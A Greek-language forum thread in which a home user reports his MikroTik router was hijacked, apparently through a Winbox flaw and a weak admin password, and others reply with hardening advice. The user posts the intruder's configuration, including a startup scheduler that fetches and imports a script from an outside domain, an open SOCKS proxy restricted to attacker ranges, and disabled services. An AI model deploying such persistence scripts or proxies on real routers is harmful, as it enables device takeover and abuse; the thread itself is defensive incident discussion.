PDA

Επιστροφή στο Forum : Επίθεση σε Mikrotik router



gvast
22-10-18, 23:15
Καλησπέρα σας,
Καταρχάς συγχαρήτηρια στην ομάδα, ωραία δουλειά.

Τώρα... long story short... Επιστρέφω σήμερα από τη δουλειά μετά τις 4 το μεσημέρι, κάνω τη ρουτίνα μου και το απόγευμα λέω να συνδεθώ στο ΜΤ για να συνεχίσω το μικρό οικιακό μου project.Η πρώτη προσπάθεια μέσω Winbox και χρήση IP απέτυχε. Προσπαθώ μέσω browser, μπαίνω κανονικά. Περίεργο... σκέφτομαι. Προσπαθώ ξανά μέσω Winbox αλλά χρήση MAC και μπαίνω.
Στο Winbox έχω μόνιμα το log ανοιχτό. Βλέπω τα αποτυχημένα μου logins αλλά..., πιο πάνω βλέπω log entries για αλλαγές στο firewall, script που έτρεχε συνέχεια και άλλα τέτοια περίεργα. Όλα αυτά είχαν timestamp πριν τις 4 (όταν δλδ εγώ ήμουν στη δουλειά) που σημαίνει ότι κάποιος άλλος έκανε login ως admin και άλλαξε το configuration.

Ευτυχώς είχα πρόσφατο :worthy: backup. Έσωσα το "μολυσμένο" configuration στο σκληρό δίσκο και επανέφερα το ΜΤ πάλι σε ορθή λειτουργία. Τέλος καλό όλα καλά θέλω να πιστεύω.

Παραθέτω παρακάτω τις αλλαγές που έκανε ο επιτιθέμενος στο configuration μπας και καταλάβουμε τι ήθελε να πετύχει, αλλά και να μάθω αν το όλο θέμα οφείλεται σε δικές μου παραλείψεις σε θέματα ασφάλειας ή σε αδυναμία του Winbox.



/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot

/ip firewall filter
add action=accept chain=input dst-port=9896 protocol=tcp
add action=reject chain=output dst-address=139.99.5.202 protocol=tcp
add action=reject chain=output dst-address=95.154.216.166 protocol=tcp
add action=accept chain=input dst-port=9896 protocol=tcp

/system scheduler
add disabled=yes interval=2d name=U6 on-event="/tool fetch url=http://my1story\
.xyz/poll/ce685827-b618-42bf-960e-6abcdbd750de mode=http dst-path=7wmp0b4s\
wouv\r\
\n/import 7wmp0b4swouv" policy=\
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
startup



Επίσης μου έχει προσθέσει έναν DNS server με IP 1.1.1.1

Να προσθέσω ότι είχα εύκολο password (τέτοιο που σπάει με λεξικό) για τον admin user το οποίο το έχω ήδη αλλάξει.

Αυτά από εμένα... τα φώτα σας τώρα... τι λέτε να έκανε στο router μου ο επιτιθέμενος βάση αυτών που σας έχω πει μέχρι στιγμής;

euri
22-10-18, 23:32
Υπήρξε την άνοιξη ένα κενό ασφαλείας στο Winbox:
https://blog.mikrotik.com/security/winbox-vulnerability.html
https://forum.mikrotik.com/viewtopic.php?t=133533

Και τώρα είδα αυτό:
https://blog.mikrotik.com/security/new-exploit-for-mikrotik-router-winbox-vulnerability.html
(δεν είναι νέο κενό ασφαλείας, απλά διαφορετικός τρόπος επίθεσης για το παραπάνω κενό)

gvast
23-10-18, 19:26
Ευχαριστώ euri.
Έκανα το ugrade μου, έχω άλλαξει και τα passwords και από εδώ και πέρα θα δώσω μεγαλύτερη προσοχή στο κομμάτι ασφάλεια.
Δεν έχω μεγάλη εμπειρία αλλά κάτι θα καταφέρω στο τέλος.

- - - Updated - - -

Για κάποιο λόγο ξέσχασα να δώσω και κάποιες άλλες αλλαγές που μου έκανε στο configuration. Παραθέτω παρακάτω:



/ip service
set telnet disabled=yes
set ssh port=26711
set api disabled=yes
set winbox disabled=yes
set api-ssl disabled=yes

/ip socks
set enabled=yes port=9896

/ip socks access
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0
add src-address=5.188.0.0/15
add src-address=192.243.0.0/16
add src-address=5.9.0.0/16
add src-address=5.104.0.0/16
add action=deny src-address=0.0.0.0/0


Επίσης παρατήρησα σήμερα ότι αργά το βράδυ (γύρω στις 3 το βράδυ) μια προσπάθεια προσβασης στο vpn που στήνω. Αλλά είδα εδώ (https://isakmpscan.shadowserver.org/) ότι είναι μια τακτική η οποία είναι γενικά ακίνδυνη.

griniaris
23-10-18, 19:39
Εγω εχω τις τελευταιες μερες πολλες επιθεσεις απο Ρωσσια.

Γινεται αυτοματα μπλοκαρισμα της ΙΡ στις 5 αποτυχημενες προσταθειες σε χρονο 5 λεπτων.

Προσπαθω να βρω λυση με GEO LOCK . ακομα βεβαια ειμαι στο διαβασμα για να μαζεψω πληροφοριες.
Αλλα εχω κολλησει στο να βρω ολο το μπλοκ ΙΡ της Ελλαδος . Αν ηταν συνεχομενο θα ειχα ξεμπερδεψει.
Αλλα βλεπω υπαρχουν πολλα διασπαρτα.

Θα ηταν τελειο να καταφερω να περιορισω την προσβαση μονο σε Ελληνικες ΙΡ.

seatakias
23-10-18, 22:58
Γινεται αυτοματα μπλοκαρισμα της ΙΡ στις 5 αποτυχημενες προσταθειες σε χρονο 5 λεπτων

Πως γίνεται να κάνουμε μπλοκαρισμα IP μετά από αποτυχημενες προσπάθειες;

griniaris
24-10-18, 01:35
Πως γίνεται να κάνουμε μπλοκαρισμα IP μετά από αποτυχημενες προσπάθειες;

Υπαρχουν πολλοι τροποι. Δεν ξερω ποιος ειναι ο καλυτερος. Οποιον βολευει καποιον.

Υπαρχουν οδηγοι παντου. Κανε ενα search. Στα προχειρα... κοιτα εδω (https://www.youtube.com/watch?v=O5_gmpL9F4E)και εδω (https://www.youtube.com/watch?v=PftoNyz7UFo).

Αφου καταλαβεις τι παιζει το τροποποιεις οπως σε βολευει.

Nikiforos
24-10-18, 06:22
καλημέρα, @gvast δες και εδώ στο θεμα μας https://www.adslgr.com/forum/threads/858118-Mikrotik-IPv4-IPv6-firewall
εχουμε βαλει πολλους σχετικους κανονες.
Και πρεπει να εχεις και τελευταια ROS που εχουν κλεισει τα κενα ασφαλειας δλδ την stable, υποθετω ειχες παλια εκδοση.
Και παλι όμως θες κανονες fw rules για προστασια και αν μπορεις μην βγαζεις στο ιντερνετ υπηρεσίες του όπως πχ το winbox!
προσωπικα δεν βγαζω τπτ ότι θελω τα κανω μεσω openvpn και μονο.
Ότι βολευει τον καθενα είναι πολύ ποιο ασφαλες αντι να βγαζεις κάθε υπηρεσια του στο ιντερνετ, δλδ winbox, ftp, webfig, ssh, telnet κτλ.
Σε δικα μου με ιντερνετ εχω δει port scanners αλλα μπλοκάρονται συνεχεια και δεν εχει γινει κατι παραπανω. Exω και κανονες σχετικους με scan, brute force και για επιθεσεις σε κάθε μορφης υπηρεσια παρολο ότι δεν τις βγαζω απεξω.
ΠΑΝΤΑ βαζω την τελευταια STABLE ROS και εννοείτε δεν υπαρχει user admin.

Eνα 951 με κινητη που εχω, μολις μου το εκαναν να εχει public ip την ωρα που το εστηνα εβλεπα στα logs της ποπης από επιθεσεις!
όλα καλα μετα, μεχρι που μου την πεσανε μεσω DNS!!! και μου εφαγαν όλα τα δεδομενα μεσα σε ένα ΣΚ.
Μετα εβαλα κανονα και για το DNS και μετα κανενα πρόβλημα από τοτε.

Δες εδώ κανονες προστασιας https://www.marthur.com/networking/mikrotik-setup-brute-force-protection/382/
και εδώ https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router

seatakias
24-10-18, 11:35
Υπαρχουν πολλοι τροποι. Δεν ξερω ποιος ειναι ο καλυτερος. Οποιον βολευει καποιον.

Υπαρχουν οδηγοι παντου. Κανε ενα search. Στα προχειρα... κοιτα εδω (https://www.youtube.com/watch?v=O5_gmpL9F4E)και εδω (https://www.youtube.com/watch?v=PftoNyz7UFo).

Αφου καταλαβεις τι παιζει το τροποποιεις οπως σε βολευει.

Ευχαριστώ θα το κοιτάξω.

macro
27-10-18, 10:58
Ή απλα μπορεις να βαλεις μονο εναν κανονα για τοπικο login στο winbox του στυλ......


add chain=input action=drop connection-state=new src-address-list=!Trusted winbox logins

Οπου src. add. list θα βαλεις το δικτυο σου (π.χ. 192.168.1.0/24), βαλε και ενα timeout=24h και φτιαξε πρωτα το κανονα του address-list, για να μη κλειδωθεις απ' εξω μολις τον περασεις.

Με αυτο το κανονα δε χρειαζεσαι τπτ αλλο, ουτε brute force ουτε port scanners............. τιποτα.


Αν και νομιζω οτι αν εχεις κανονα allow lan input-forward καθως και drop everything else input-forward παλι δε μπορει να μπει κανενας.

galotzas
27-10-18, 11:55
Αυτο που εγραψε ο nikiforos https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router ειναι το καλυτερο μιας και ειναι το επισημο για τις τελευταιες επιθεσεις. Το εχω ακολουθησει βημα βημα και δεν εχω παρατηρησει το παραμικρο.

macro
27-10-18, 12:23
Εγω τα εχω κοψει ολα..... ssh telnet, τα παντα.

Nikiforos
28-10-18, 16:18
καλησπέρα, για port scanners καλο ειναι να εχουμε κανονα ωστε και οι ips καταγραφονται και τρωνε και block.
Κακο ΔΕΝ κανει!
και εγω τα εχω κοψει ολα και μπαινω ΜΟΝΟ μεσω OPENVPN και απο πουθενα αλλου, με καποιες εξαιρεσεις για το AWMΝ που δεν ειναι επι του παρον τοπικ και forum να αναλυσω.
Οσο περισσοτερη ασφαλεια εχουμε τοσο ποιο δυσκολο ειναι για καποιο να εισχωρησει στο μηχανημα μας.

Follow_Security
04-11-18, 19:26
οριστε και μερικες διευθυνσεις portscanning...
τον περασμενο μηνα χτυπησα ρεκορ... 5.972 μπλοκαρισμενες διεθυνσεις...

Flags: X - disabled, D - dynamic # LIST ADDRESS CREATION-TIME TIMEOUT
0 D port scanners 40.112.90.122 oct/28/2018 19:17:42 1w54m57s
1 D port scanners 13.94.136.165 oct/30/2018 21:36:02 1w2d3h13m17s
2 D port scanners 137.116.234.82 nov/01/2018 16:44:56 1w5d12h48m10s
3 D port scanners 80.107.188.48 nov/01/2018 21:47:28 1w4d3h34m31s
4 D port scanners 79.166.56.185 nov/01/2018 22:13:19 1w4d9h37m42s
5 D port scanners 84.254.11.132 nov/01/2018 22:29:08 1w4d9h17m23s
6 D port scanners 85.74.146.90 nov/01/2018 23:18:26 1w4d5h27m44s
7 D port scanners 178.59.156.190 nov/02/2018 00:20:15 1w4d5h57m31s

galotzas
04-11-18, 20:56
Portscan απο microsoft cyta otenet και vodafone? Καμια ρωσια περιμενα και κινα..... Ειναι σιγουρα portscan αυτα?

Follow_Security
04-11-18, 21:03
ναι ... 100% ειναι P.S. Εχω ειδικα Rules για να καταγραφω την αιτουμενη πορτα και την IP που την ζητησε... ειναι ολες εξωτερικου βεβαια, καμια δεν ειναι απο ελλαδα...

galotzas
04-11-18, 21:07
ναι ... 100% ειναι P.S. Εχω ειδικα Rules για να καταγραφω την αιτουμενη πορτα και την IP που την ζητησε... ειναι ολες εξωτερικου βεβαια, καμια δεν ειναι απο ελλαδα...

Παντως αυτες που δειχνεις εκτος απο 3 microsoft οι αλλες ειναι ελλαδα.

Follow_Security
04-11-18, 22:20
πολυ πιθανον! κανω συχνα δοκιμες στα φιλτρα προστασιας μου...

smarag
18-11-18, 18:50
μπορείς να φτιάξεις το Firewall σου να κάνεις κανόνες accept στο input για ότι θες να επιτρέπεις και κανόνες drop για να κόψεις ολα τα υπόλοιπα έτσι έχεις καλύτερη προστασία στο router σου επίσης δές εδώ https://wiki.mikrotik.com/wiki/Manual:Securing_Your_Router

@ ADSLgr.com All rights reserved.